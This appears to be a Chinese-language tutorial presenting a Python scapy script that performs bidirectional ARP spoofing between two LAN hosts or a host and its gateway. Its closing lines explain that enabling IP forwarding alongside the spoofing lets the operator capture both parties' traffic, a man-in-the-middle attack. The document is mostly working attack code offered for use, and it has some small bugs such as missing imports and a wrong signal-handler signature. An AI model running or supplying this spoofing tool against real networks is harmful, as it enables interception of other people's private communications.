使用scapy 包发送ARP欺骗包,进行ARP欺骗
- 创建ARP包
import sys
import signal
from scapy.all import (
get_if_hwaddr,
getmacbyip,
ARP,
Ether,
sendp
)
from StaticTools import *
'''
Arp欺骗的主要函数代码
'''
class Arp:
def __init__(self, directIP, sourdeIP):
self.interface = netifaces.gateways()['default'][netifaces.AF_INET][1] # 本机网卡名称
# self.host = NetTools.getGateway_ip() # 网关ip
self.source = sourdeIP
self.direct = directIP # 目标ip
self.mac = get_if_hwaddr(self.interface)
self.source_mac = getmacbyip(self.source)
self.direct_mac = getmacbyip(self.direct)
self.reverse = True
'''
ARP欺骗
'''
def arpSpoofing(self):
source_pkt = None
direct_pkt = None
signal.signal(signal.SIGINT, self.__rearp)
source_pkt = self.__build_req(self.direct, self.source)
direct_pkt = self.__build_req(self.source, self.direct)
while True:
sendp(source_pkt, inter=2, iface=self.interface)
sendp(direct_pkt, inter=2, iface=self.interface)
time.sleep(2)
'''
ARP数据包,target 和host 分别是欺骗的两个ip地址
'''
def __build_req(self, target, host):
# target 目标地址
if target is None:
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=self.mac, psrc=host, pdst=host)
elif target:
target_mac = getmacbyip(target)
if target_mac is None:
print ("Could not resolve targets MAC address")
sys.exit(1)
pkt = Ether(src=self.mac, dst=target_mac) / ARP(hwsrc=self.mac, psrc=host, hwdst=target_mac, pdst=target,op=2)
return pkt
'''
ARP恢复数据包
'''
def __rearp(self):
pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff') / ARP(psrc=self.mac, hwsrc=self.mac, op=2)
sendp(pkt, inter=1, count=5, iface=self.interface)
if self.reverse:
r_pkt = Ether(src=self.direct_mac, dst=self.source_mac) / ARP(hwsrc=self.direct_mac, psrc=self.direct,
hwdst=self.source_mac, pdst=self.source, op=2)
sendp(r_pkt, inter=1, count=5, iface=self.interface)
d_pkt = Ether(src=self.source_mac, dst=self.direct_mac) / ARP(hwsrc=self.source_mac, psrc=self.source,
hwdst=self.direct_mac, pdst=self.direct, op=2)
sendp(d_pkt, inter=1, count=5, iface=self.interface)
sys.exit(0)
if __name__ == "__main__":
args = sys.argv
arps = Arp(args[1], args[2])
#arps =Arp("192.168.1.2","192.168.1.3")
arps.arpSpoofing()
对于局域网内通信,运行时,输入双向欺骗目标。
对于局域网内目标和外部通信,运行时输入欺骗目标和网关地址
在ARP欺骗的同时,开启路由转发,既可获取双方通信内容。